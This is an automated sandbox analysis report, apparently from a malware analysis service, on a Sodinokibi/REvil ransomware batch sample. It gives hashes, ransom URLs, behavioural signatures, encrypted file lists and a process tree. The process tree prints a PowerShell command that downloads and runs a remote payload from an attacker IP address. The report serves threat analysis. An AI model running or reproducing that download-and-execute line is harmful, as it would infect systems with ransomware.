Analysis
- max time kernel: 75s
- max time network: 44s
- platform: windows10_x64
- resource: win10v200722
- submitted: 31-08-2020 11:10
Static task: static1
Behavioral task: behavioral1
- Sample: 14a4a3784dbc627e1c40e41285df29c2.bat
- Resource: win7
Behavioral task: behavioral2
- Sample: 14a4a3784dbc627e1c40e41285df29c2.bat
- Resource: win10v200722
General
- Target: 14a4a3784dbc627e1c40e41285df29c2.bat
- Size: 214B
- MD5: 382d73e9001eda598dfc10e833b7742b
- SHA1: c732b41c5dc34d1b378fb23cc634cc6ee82774fa
- SHA256: 4acb6253945b477cb489a9b8adbe3e5dff9f142c7ec942a0a6d4902ccea3ffd7
- SHA512: b046949436d9c1f153298971c3140b76f5802be988a2b95dca2f2df6102dfdff7d92f3da0fe6c813a65f2af6abd0a8a2227177f3787252d738e82b2231a121eb
Malware Config
Extracted from: http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2
Extracted from: C:\67wsw-readme.txt
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D
- http://decryptor.cc/AF6D107408866E7D
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (1 IoC)
  Processes:
  - flow 11, PID 1640: powershell.exe
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process: powershell.exe
  - File renamed C:\Users\Admin\Pictures\FindAssert.tif => \??\c:\users\admin\pictures\FindAssert.tif.67wsw
  - File renamed C:\Users\Admin\Pictures\NewConnect.tiff => \??\c:\users\admin\pictures\NewConnect.tiff.67wsw
  - File renamed C:\Users\Admin\Pictures\RestartSearch.tif => \??\c:\users\admin\pictures\RestartSearch.tif.67wsw
  - File renamed C:\Users\Admin\Pictures\DisconnectResolve.crw => \??\c:\users\admin\pictures\DisconnectResolve.crw.67wsw
  - File renamed C:\Users\Admin\Pictures\PushReceive.crw => \??\c:\users\admin\pictures\PushReceive.crw.67wsw
  - File opened for modification \??\c:\users\admin\pictures\ConvertToWrite.tiff
  - File opened for modification \??\c:\users\admin\pictures\NewConnect.tiff
  - File renamed C:\Users\Admin\Pictures\ConvertToUnblock.tif => \??\c:\users\admin\pictures\ConvertToUnblock.tif.67wsw
  - File renamed C:\Users\Admin\Pictures\ConvertToWrite.tiff => \??\c:\users\admin\pictures\ConvertToWrite.tiff.67wsw
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Process: vssvc.exe
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: powershell.exe
  - Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0954u7.bmp"
- Drops file in Program Files directory (37 IoCs)
  Process: powershell.exe
  - File opened for modification \??\c:\program files\UninstallPublish.wpl
  - File opened for modification \??\c:\program files\UnpublishExit.js
  - File opened for modification \??\c:\program files\ApproveGroup.docx
  - File opened for modification \??\c:\program files\CompareUse.jpg
  - File opened for modification \??\c:\program files\OptimizeSync.DVR
  - File opened for modification \??\c:\program files\StepStop.pps
  - File opened for modification \??\c:\program files\SubmitCompare.xsl
  - File opened for modification \??\c:\program files\WatchUse.avi
  - File opened for modification \??\c:\program files\ConnectDismount.potx
  - File opened for modification \??\c:\program files\DisconnectExpand.xps
  - File opened for modification \??\c:\program files\ExportInitialize.bmp
  - File opened for modification \??\c:\program files\JoinWatch.dwg
  - File opened for modification \??\c:\program files\MountEnable.vb
  - File created \??\c:\program files\67wsw-readme.txt
  - File opened for modification \??\c:\program files\ExportWait.7z
  - File opened for modification \??\c:\program files\MergeInstall.vssm
  - File opened for modification \??\c:\program files\OpenOptimize.asf
  - File opened for modification \??\c:\program files\CheckpointGroup.dotx
  - File opened for modification \??\c:\program files\CompareGet.js
  - File opened for modification \??\c:\program files\ConnectEnable.emf
  - File opened for modification \??\c:\program files\FindRemove.sql
  - File opened for modification \??\c:\program files\UpdateDeny.ADT
  - File opened for modification \??\c:\program files\ClearGrant.xhtml
  - File opened for modification \??\c:\program files\ImportDebug.zip
  - File opened for modification \??\c:\program files\MoveGet.wpl
  - File opened for modification \??\c:\program files\UpdateLimit.pdf
  - File opened for modification \??\c:\program files\PublishRepair.asx
  - File opened for modification \??\c:\program files\SetAdd.mpg
  - File opened for modification \??\c:\program files\SuspendCopy.xla
  - File created \??\c:\program files (x86)\67wsw-readme.txt
  - File opened for modification \??\c:\program files\ExpandUnprotect.gif
  - File opened for modification \??\c:\program files\ExportHide.mp3
  - File opened for modification \??\c:\program files\OptimizeDebug.tif
  - File opened for modification \??\c:\program files\ResizeUnblock.cr2
  - File opened for modification \??\c:\program files\ResumeFormat.cfg
  - File opened for modification \??\c:\program files\UnblockCheckpoint.php
  - File opened for modification \??\c:\program files\UnblockNew.pptm
- Drops file in Windows directory (1 IoC)
  Process: svchost.exe
  - File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat
- Modifies data under HKEY_USERS (6 IoCs)
  Process: svchost.exe
  - Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
  - Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7
  - Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"
  - Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = e1bd118a987fd601
  - Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
  - PID 1640: powershell.exe (reported 5 times)
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  Processes:
  - Token: SeShutdownPrivilege, PID 420: svchost.exe
  - Token: SeCreatePagefilePrivilege, PID 420: svchost.exe
  - Token: SeDebugPrivilege, PID 1640: powershell.exe
  - Token: SeDebugPrivilege, PID 1640: powershell.exe
  - Token: SeTakeOwnershipPrivilege, PID 1640: powershell.exe
  - Token: SeBackupPrivilege, PID 184: vssvc.exe
  - Token: SeRestorePrivilege, PID 184: vssvc.exe
  - Token: SeAuditPrivilege, PID 184: vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  - PID 3816 (cmd.exe) wrote to memory of PID 1640 (powershell.exe), reported 3 times
Processes
- C:\Windows\system32\cmd.exe (PID 3816)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\14a4a3784dbc627e1c40e41285df29c2.bat"
  - Suspicious use of WriteProcessMemory
  - Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1640)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2');Invoke-ZZXMUDC;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe (PID 420)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 184)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken